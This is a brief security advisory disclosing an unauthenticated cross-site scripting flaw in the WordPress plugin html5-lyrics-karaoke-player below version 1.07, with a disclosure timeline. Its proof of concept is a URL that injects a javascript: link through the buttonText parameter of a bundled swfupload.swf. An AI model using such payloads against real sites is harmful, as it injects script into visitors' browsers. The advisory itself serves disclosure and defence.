wp-plugin : html5-lyrics-karaoke-player

Plugin Details
Plugin Name: wp-plugin : html5-lyrics-karaoke-player
Effected Version : <1.07 (and most probably lower version's if any)
Vulnerability : Components with Known Vulnerabilities
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/plugins/html5lyricskaraokeplayer/html5lyrics/swfupload/swfupload.swf?buttonText=%3Ca%20href=%22javascript:alert(1)%22%3EClick+For+XSS%20%3Cfont%20size=%2216%22%3E%3C/a%3E


Disclosure Timeline
Vendor Contacted : 2013-12-09
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number :
Plugin Description :
[ Karaoke Player ]